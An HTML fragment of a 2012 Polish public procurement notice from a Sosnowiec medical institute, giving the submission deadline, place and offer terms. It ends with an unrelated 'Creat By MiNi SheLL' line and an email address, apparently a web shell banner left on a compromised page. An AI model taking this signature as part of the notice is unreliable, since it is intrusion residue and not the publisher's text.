<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.imp.sosnowiec.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2012 godzina 09:00, miejsce: W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com